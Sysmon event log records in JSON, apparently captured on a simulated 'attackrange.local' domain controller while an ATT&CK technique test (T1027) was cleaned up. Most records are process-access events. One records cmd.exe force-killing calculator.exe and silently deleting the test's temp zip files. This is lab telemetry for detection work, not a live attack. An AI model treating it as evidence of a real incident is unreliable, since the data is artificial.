{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5587,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.641\r\nSourceProcessGUID: {A837DB8D-032F-5F25-0000-0010BE790A00}\r\nSourceProcessId: 3088\r\nSourceThreadId: 4876\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-0330-5F25-0000-001013B80A00}\r\nTargetProcessId: 1560\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1F3FFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b42a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b452d|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3ed3|UNKNOWN(00007FFF44882483)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.641","SourceProcessGUID":"{A837DB8D-032F-5F25-0000-0010BE790A00}","SourceProcessId":"3088","SourceThreadId":"4876","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-0330-5F25-0000-001013B80A00}","TargetProcessId":"1560","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1f3fff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b42a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b452d|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3ed3|UNKNOWN(00007FFF44882483)","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5588,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.641\r\nSourceProcessGUID: {A837DB8D-032E-5F25-0000-001070530A00}\r\nSourceProcessId: 660\r\nSourceThreadId: 2988\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0330-5F25-0000-001013B80A00}\r\nTargetProcessId: 1560\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.641","SourceProcessGUID":"{A837DB8D-032E-5F25-0000-001070530A00}","SourceProcessId":"660","SourceThreadId":"2988","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0330-5F25-0000-001013B80A00}","TargetProcessId":"1560","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5589,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.648\r\nProcessGuid: {A837DB8D-0330-5F25-0000-0010DEB80A00}\r\nProcessId: 5088\r\nImage: C:\\Windows\\System32\\taskkill.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Terminates Processes\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: taskkill.exe\r\nCommandLine: taskkill  /f /im calculator.exe  \r\nCurrentDirectory: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-032E-5F25-0000-0020CE520A00}\r\nLogonId: 0xA52CE\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=8C066C766F5CD84CBC47E14712C54FD0,SHA256=0EA8C0267A76B543302C4258B78BC477AA8876767B7A526549CCE34EEF6D859F,IMPHASH=5F3868B59CD541824A308E7BB7B9CAC3\r\nParentProcessGuid: {A837DB8D-0330-5F25-0000-001013B80A00}\r\nParentProcessId: 1560\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: \"C:\\Windows\\system32\\cmd.exe\" /c \"taskkill /f /im calculator.exe >nul 2>nul & rmdir /S /Q %temp%\\temp_T1027.zip >nul 2>nul & del /Q \"%temp%\\T1027.zip\" >nul 2>nul\" ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.648","ProcessGuid":"{A837DB8D-0330-5F25-0000-0010DEB80A00}","Image":"C:\\Windows\\System32\\taskkill.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Terminates Processes","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"taskkill.exe","CommandLine":"taskkill  /f /im calculator.exe  ","CurrentDirectory":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-032E-5F25-0000-0020CE520A00}","LogonId":"0xa52ce","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=8C066C766F5CD84CBC47E14712C54FD0,SHA256=0EA8C0267A76B543302C4258B78BC477AA8876767B7A526549CCE34EEF6D859F,IMPHASH=5F3868B59CD541824A308E7BB7B9CAC3","ParentProcessGuid":"{A837DB8D-0330-5F25-0000-001013B80A00}","ParentProcessId":"1560","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"taskkill /f /im calculator.exe &gt;nul 2&gt;nul &amp; rmdir /S /Q %temp%\\temp_T1027.zip &gt;nul 2&gt;nul &amp; del /Q \"%temp%\\T1027.zip\" &gt;nul 2&gt;nul\" ","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5590,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.641\r\nSourceProcessGUID: {A837DB8D-0330-5F25-0000-001013B80A00}\r\nSourceProcessId: 1560\r\nSourceThreadId: 4848\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {A837DB8D-0330-5F25-0000-0010DEB80A00}\r\nTargetProcessId: 5088\r\nTargetImage: C:\\Windows\\system32\\taskkill.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+8564|C:\\Windows\\system32\\cmd.exe+c347|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.641","SourceProcessGUID":"{A837DB8D-0330-5F25-0000-001013B80A00}","SourceProcessId":"1560","SourceThreadId":"4848","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{A837DB8D-0330-5F25-0000-0010DEB80A00}","TargetProcessId":"5088","TargetImage":"C:\\Windows\\system32\\taskkill.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+8564|C:\\Windows\\system32\\cmd.exe+c347|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5591,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.641\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0330-5F25-0000-0010DEB80A00}\r\nTargetProcessId: 5088\r\nTargetImage: C:\\Windows\\system32\\taskkill.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.641","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0330-5F25-0000-0010DEB80A00}","TargetProcessId":"5088","TargetImage":"C:\\Windows\\system32\\taskkill.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5592,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.641\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.641","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5593,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.641\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.641","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5594,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.641\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.641","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5595,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.641\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.641","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
